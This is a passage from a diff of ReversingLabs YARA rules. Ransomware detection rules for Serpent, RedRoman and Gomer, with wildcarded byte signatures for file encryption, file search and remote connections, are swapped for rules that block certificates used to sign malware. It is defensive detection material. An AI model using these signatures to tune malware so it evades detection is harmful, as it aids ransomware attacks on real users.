8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? - ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 39 74 24 ?? 76 - ?? 4C 8D 0D ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24 - ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? - 48 8B CB FF 15 - } - condition: - uint16(0)==0x5A4D and $find_files and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "EXEC CONTROL LIMITED" and pe.signatures[i].serial=="4f:5a:9b:f7:5d:a7:6b:94:96:45:47:54:73:79:3a:7d" and 1553817600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Serpent : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_081Df56C9A48D02571F08907 : INFO FILE { meta: - description = "Yara rule that detects Serpent ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0757ad7c-b2b1-5323-960a-55ffe3eaed12" - date = "2020-07-15" - modified = "2020-07-15" + id = "4f4fb099-406a-5def-9a26-46c6807cfe7f" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Serpent.yara#L1-L122" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5e1917e8d23a5edc65ac423f3d18cc78c3848bd6c1ccc67d052eb37172857081" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14730-L14746" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "25d91f09e0731ab09a05855442b72589eb30e1c7d5e4c0a7af760eea540d786f" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Serpent" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $do_dll_stuff_and_create_thread = { - 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 68 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 89 D2 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 89 FF 90 90 6A ?? 53 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? - ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B 75 ?? BA - ?? ?? ?? ?? 66 0F 6E D2 89 FF 89 C9 31 D2 66 0F 7E D2 89 15 ?? ?? ?? ?? 81 3D ?? ?? - ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B 75 ?? BB ?? ?? ?? ?? 89 C9 4B - 75 ?? 89 C9 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B - 75 ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ?? - ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 4B - 75 ?? 89 FF 90 BB ?? ?? ?? ?? 89 C9 4B 75 ?? 90 90 BB ?? ?? ?? ?? 4B 75 ?? BB ?? ?? - ?? ?? 4B 75 ?? BB ?? ?? ?? ?? 4B 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 90 BB ?? ?? ?? ?? 89 D2 4B 75 ?? 6A ?? 68 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? BA ?? - ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 90 89 C9 BB ?? ?? ?? ?? 89 FF 4B 75 ?? 68 ?? ?? ?? ?? - 6A ?? 56 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 89 D2 4B 75 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 33 - C0 A3 ?? ?? ?? ?? 64 8B 35 ?? ?? ?? ?? 89 35 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? - 90 89 F6 90 BB ?? ?? ?? ?? 89 DB 4B 75 ?? 89 D2 89 C0 BB ?? ?? ?? ?? 89 D2 4B 75 ?? - C7 05 ?? ?? ?? ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 89 FF 4B 75 ?? 89 C0 0F 31 90 89 C7 0F - 31 90 89 C0 29 F8 89 D2 89 DB 77 ?? 90 90 89 C9 89 F6 8B 3D ?? ?? ?? ?? 90 90 89 C9 - 89 F6 90 03 3D ?? ?? ?? ?? 90 90 89 C9 89 F6 FF D7 89 F6 90 90 BB ?? ?? ?? ?? 4B 75 - ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? C3 - } - $find_files = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 C0 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? - ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 - ?? 8B 58 ?? 83 7B ?? ?? 75 ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8D 55 ?? - A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 73 ?? 6A ?? 8D 45 ?? 50 8B 43 ?? 50 E8 ?? ?? ?? ?? - 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? - 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 43 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C6 85 ?? - ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? C6 85 - ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 8D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 EB ?? 8B 43 ?? 89 - 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? - 89 B5 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 95 ?? ?? ?? ?? - A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B D8 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 - } - $remote_connection = { - 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 FF 05 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ?? - ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 66 8B 83 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? - ?? ?? 8D 55 ?? 33 C0 8A 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 68 ?? ?? ?? ?? 66 8B 83 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? - ?? ?? 8D 55 ?? 33 C0 8A 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 45 ?? 8D 93 ?? ?? ?? - ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B - 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 45 ?? 8D 93 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? - ?? 8B 08 FF 51 ?? 8D 55 ?? 0F B7 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 55 ?? 0F B7 - 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 - ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A ?? - 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 81 FE ?? ?? ?? ?? 76 ?? E8 ?? ?? ?? ?? 66 89 B3 ?? - ?? ?? ?? 66 C7 45 ?? ?? ?? 66 C7 45 ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 0F B7 C6 50 E8 ?? ?? ?? ?? 66 81 BB ?? ?? ?? ?? ?? ?? 75 ?? 8D 4D ?? 66 BA - ?? ?? 8B C3 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 50 0F B7 83 ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? FF 0D ?? ?? ?? - ?? 83 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 - } - $remote_ftp_connection = { - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 66 - 8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? - ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ?? - ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 81 B8 ?? ?? ?? ?? ?? ?? 75 ?? B9 - ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 66 8B 80 - ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74 - ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? - ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 83 B8 - ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74 ?? 8D 55 ?? 8B 5D ?? 8B 83 - ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 - ?? 8A 80 ?? ?? ?? ?? 2C ?? 72 ?? 74 ?? FE C8 74 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B - 45 ?? FF B0 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? FF B0 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? EB ?? 8B 45 ?? 8B 88 - ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 - FF 53 ?? EB ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B - 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? - 80 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? - ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? - 8B 45 ?? 66 8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 - ?? ?? ?? ?? ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? - B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 81 B8 ?? ?? ?? ?? ?? - ?? 75 ?? B9 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D - 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 - ?? 66 8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ?? - ?? ?? ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ?? - A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74 ?? - 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 - } - condition: - uint16(0)==0x5A4D and $do_dll_stuff_and_create_thread and $find_files and $remote_connection and $remote_ftp_connection + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="08:1d:f5:6c:9a:48:d0:25:71:f0:89:07" and 1474870728<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Redroman : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_77D5C1A3E623575999C74409Dc19753C : INFO FILE { meta: - description = "Yara rule that detects RedRoman ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c860586a-fa50-5bb4-a3b4-13506f9d6030" - date = "2021-05-10" - modified = "2021-05-10" + id = "8f8ce24d-8330-509a-a7a1-2727c6f8bdd9" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.RedRoman.yara#L1-L82" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6fb2ac0e7f7ac095766e27c057e5124406dc493c08d01a7e5381403d794c7240" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14748-L14764" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "54921ce39a0876511b33ac6fa088c3342e2ea7fa037423fe72825bfe9c83bce6" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "RedRoman" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? - ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? - ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? ?? - ?? ?? BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 C7 84 - 24 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 85 C0 75 ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? - ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? - ?? ?? 48 89 44 24 ?? 41 B9 ?? ?? ?? ?? 45 33 C0 BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 6B C9 ?? 48 89 84 0C ?? ?? ?? ?? 48 C7 84 24 - ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 85 C0 75 ?? B8 ?? ?? ?? ?? 48 6B C0 ?? 48 83 BC 04 ?? - ?? ?? ?? ?? 74 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 84 - 24 ?? ?? ?? ?? EB ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? - E9 ?? ?? ?? ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 89 01 48 8B 44 24 ?? 48 8B - 40 ?? 48 83 38 ?? 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? B8 ?? ?? - ?? ?? 48 6B C0 ?? 48 83 BC 04 ?? ?? ?? ?? ?? 74 ?? B8 ?? ?? ?? ?? 48 6B C0 ?? 48 8B - 8C 04 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8 - } - $encrypt_files_p2 = { - 4C 8D 05 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 89 - 55 ?? 48 89 45 ?? EB ?? 31 C0 41 89 C0 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 89 - 45 ?? EB ?? 48 8B 45 ?? 48 83 F8 ?? 74 ?? 48 8B 55 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? EB ?? EB ?? 48 81 C4 ?? ?? ?? ?? 5D C3 48 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 48 8B - 85 ?? ?? ?? ?? 48 85 C0 74 ?? EB ?? EB ?? 0F 0B 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? - ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? - ?? ?? C6 85 ?? ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? - ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? - ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? - 48 89 85 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? - 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 85 - C0 74 ?? EB ?? EB ?? 0F 0B 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? - ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? - ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? - ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? - 48 8B 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 89 8D - } - $find_files = { - 48 8D 9C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 D9 31 D2 E8 ?? ?? ?? ?? 48 8B 0F 48 - 89 DA E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 8D B4 24 ?? ?? ?? ?? 48 8D 9C 24 ?? - ?? ?? ?? 66 83 BC 24 ?? ?? 00 00 ?? 74 ?? EB ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8B 0F 48 - 89 DA E8 ?? ?? ?? ?? 85 C0 74 ?? 66 83 BC 24 ?? ?? 00 00 ?? 75 ?? 0F B7 84 24 ?? ?? - ?? ?? 66 85 C0 74 ?? 66 83 F8 ?? 75 ?? 66 83 BC 24 ?? ?? 00 00 ?? 74 ?? 48 8B 47 ?? - F0 48 83 00 ?? 0F 8E ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 41 - B8 ?? ?? ?? ?? 4C 89 F1 E8 ?? ?? ?? ?? 48 C7 06 ?? ?? ?? ?? 48 8D 4E ?? 48 8D 94 24 - ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 - C7 06 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 48 C7 06 ?? ?? ?? ?? C6 46 ?? ?? 89 46 ?? 48 - 89 F0 0F 28 B5 ?? ?? ?? ?? 0F 28 BD ?? ?? ?? ?? 44 0F 28 85 ?? ?? ?? ?? 44 0F 28 8D - ?? ?? ?? ?? 44 0F 28 95 ?? ?? ?? ?? 44 0F 28 9D ?? ?? ?? ?? 44 0F 28 A5 ?? ?? ?? ?? - 44 0F 28 AD ?? ?? ?? ?? 44 0F 28 B5 ?? ?? ?? ?? 44 0F 28 BD ?? ?? ?? ?? 48 8D A5 ?? - ?? ?? ?? 5B 5F 5E 41 5E 5D C3 0F 0B - } - condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="77:d5:c1:a3:e6:23:57:59:99:c7:44:09:dc:19:75:3c" and 1475884800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Gomer : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_E9756B3F38B1172Ea89Fdbdfdba5F979 : INFO FILE { meta: - description = "Yara rule that detects Gomer ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b76ac856-2abe-531d-b093-461569b9afb7" - date = "2020-10-08" - modified = "2020-10-08" + id = "77d7470c-0c60-5ef4-b1d9-35642c147afe" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Gomer.yara#L1-L106" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a53d37fcb877a12a4969a6ea1aaa67fc4106c3fbdd80a4fd39ad5a66a9df47fc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14766-L14784" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "997a9433f907896d82f22ae323bf9cfe9aa04a2a49c5505e98adbb34277fcc15" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Gomer" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B - 7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ?? - 03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? - ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 - ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F - 5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? - ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ?? - 89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ?? - ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ?? - 8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ?? - 8B C6 33 FF 5A 